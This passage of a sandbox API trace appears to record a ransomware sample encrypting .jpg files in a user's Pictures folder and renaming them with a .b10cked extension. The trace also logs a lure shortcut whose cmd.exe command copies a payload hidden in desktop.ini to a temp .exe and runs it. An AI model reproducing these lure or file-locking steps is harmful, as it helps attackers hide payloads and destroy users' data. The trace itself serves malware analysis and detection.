Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x5, riid=0x4b0dcc*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x12fc10 | out: ppv=0x12fc10*=0x1d3e18) returned 0x0 [0143.270] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d36fc*(Data1=0x214f9, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3df0) returned 0x0 [0143.270] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d370c*(Data1=0x10b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3dfc) returned 0x0 [0143.270] 
ShellLink:IShellLinkW:SetPath (This=0x1d3df0, pszFile="%SystemRoot%\\system32\\cmd.exe") returned 0x0 [0143.272] ShellLink:IShellLinkW:SetArguments (This=0x1d3df0, pszArgs="/C explorer.exe \"Pictures\" & type \"Pictures\\desktop.ini\" > \"%TEMP%\\XfsjUPkD.exe\" && \"%TEMP%\\XfsjUPkD.exe\"") returned 0x0 [0143.272] ShellLink:IShellLinkW:SetWorkingDirectory (This=0x1d3df0, pszDir="%CD%") returned 0x0 [0143.272] ShellLink:IShellLinkW:SetIconLocation (This=0x1d3df0, pszIconPath="%SystemRoot%\\system32\\shell32.dll", iIcon=3) returned 0x0 [0143.272] ShellLink:IShellLinkW:SetShowCmd (This=0x1d3df0, iShowCmd=7) returned 0x0 [0143.272] ShellLink:IPersistFile:Save (This=0x1d3dfc, pszFileName="C:\\Users\\EEBsYm5\\Pictures.lnk", fRemember=0) returned 0x0 [0143.280] ShellLink:IUnknown:Release (This=0x1d3dfc) returned 0x2 [0143.280] ShellLink:IUnknown:Release (This=0x1d3df0) returned 0x1 [0143.280] ShellLink:IUnknown:Release (This=0x1d3e18) returned 0x0 [0143.280] CoUninitialize () [0143.280] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0143.280] ReleaseMutex (hMutex=0xf8) returned 1 [0143.280] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0143.280] ReleaseMutex (hMutex=0xf8) returned 1 [0143.280] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0143.280] ReleaseMutex (hMutex=0xf8) returned 1 [0143.280] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0143.280] ReleaseMutex (hMutex=0xf8) returned 1 [0143.281] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\If0lC.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\if0lc.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0143.281] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.281] 
SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xa60f [0143.281] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.281] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=20007004209) returned 1 [0143.281] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.281] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xa60f [0143.281] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.281] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.281] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xa60f [0143.281] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.281] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0143.281] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0xa60f [0143.281] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0143.281] 
SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.281] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xa60f [0143.281] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.281] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.281] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xa60f [0143.281] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.282] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.282] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xa60f [0143.282] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.282] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.282] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xa60f [0143.282] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: 
lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.282] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.282] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xa60f [0143.282] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.282] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.282] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xa60f [0143.282] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.282] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0xa127 [0143.282] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0143.283] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0143.283] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0143.283] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0xa60f [0143.283] SetFilePointer (in: 
hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0143.283] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0143.283] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0143.283] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0xa60f [0143.283] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0143.283] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0143.283] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x5306, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x5306, lpOverlapped=0x0) returned 1 [0143.284] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0143.284] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x5306, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x5306, lpOverlapped=0x0) returned 1 [0143.284] SetFilePointer (in: hFile=0x114, lDistanceToMove=-21254, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x5309 [0143.284] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x5306, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x5306, 
lpOverlapped=0x0) returned 1 [0143.284] SetFilePointer (in: hFile=0x114, lDistanceToMove=-21254, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x5309 [0143.284] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x5306, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x5306, lpOverlapped=0x0) returned 1 [0143.288] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="If0lC.jpg", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0143.288] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="If0lC.jpg", cchWideChar=9, lpMultiByteStr=0x131322c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="If0lC.jpg", lpUsedDefaultChar=0x0) returned 9 [0143.288] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0xa60f [0143.288] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0143.288] CloseHandle (hObject=0x114) returned 1 [0143.289] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Pictures\\If0lC.jpg", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Pictures\\If0lC.jpg") returned 0x23 [0143.289] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Pictures\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Pictures\\") returned 0x1a [0143.289] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Pictures\\If0lC.jpg\" 
\"C:\\Users\\EEBsYm5\\Pictures\\If0lC.jpg.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Pictures\\If0lC.jpg\" \"C:\\Users\\EEBsYm5\\Pictures\\If0lC.jpg.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0x934, dwThreadId=0x8cc)) returned 1 [0143.291] CloseHandle (hObject=0x110) returned 1 [0143.291] CloseHandle (hObject=0x114) returned 1 [0143.291] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Pictures\\", cchLength=0x1a | out: lpsz="C:\\USERS\\EEBSYM5\\PICTURES\\") returned 0x1a [0143.291] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Pictures\\", cchLength=0x1a | out: lpsz="C:\\USERS\\EEBSYM5\\PICTURES\\") returned 0x1a [0143.291] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\PICTURES\\", cchCount1=26, lpString2="C:\\USERS\\EEBSYM5\\PICTURES\\", cchCount2=26) returned 2 [0143.291] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0143.291] ReleaseMutex (hMutex=0xf8) returned 1 [0143.291] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0143.291] ReleaseMutex (hMutex=0xf8) returned 1 [0143.291] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0143.291] ReleaseMutex (hMutex=0xf8) returned 1 [0143.291] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0143.291] ReleaseMutex (hMutex=0xf8) returned 1 [0143.291] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\isdKb.jpg" (normalized: 
"c:\\users\\eebsym5\\pictures\\isdkb.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0143.291] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.291] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x138a8 [0143.291] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.291] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=20008071828) returned 1 [0143.292] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.292] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x138a8 [0143.292] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.292] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.292] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x138a8 [0143.292] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.292] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: 
lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0143.292] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x138a8 [0143.292] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0143.292] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.292] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x138a8 [0143.292] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.292] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.292] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x138a8 [0143.292] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.292] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.292] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x138a8 [0143.292] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.292] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.292] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x138a8 [0143.292] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.292] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.293] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x138a8 [0143.293] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.293] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.293] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x138a8 [0143.293] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.293] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x133c0 [0143.293] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0143.294] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: 
lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0143.294] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0143.294] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x138a8 [0143.294] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0143.294] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0143.294] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0143.294] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x138a8 [0143.294] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0143.294] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0143.294] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x9c53, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x9c53, lpOverlapped=0x0) returned 1 [0143.294] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0143.295] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x9c53, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, 
lpNumberOfBytesWritten=0x12ec1c*=0x9c53, lpOverlapped=0x0) returned 1 [0143.295] SetFilePointer (in: hFile=0x114, lDistanceToMove=-40019, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x9c55 [0143.295] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x9c53, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x9c53, lpOverlapped=0x0) returned 1 [0143.295] SetFilePointer (in: hFile=0x114, lDistanceToMove=-40019, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x9c55 [0143.295] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x9c53, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x9c53, lpOverlapped=0x0) returned 1 [0143.299] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="isdKb.jpg", cchWideChar=9, lpMultiByteStr=0x0, 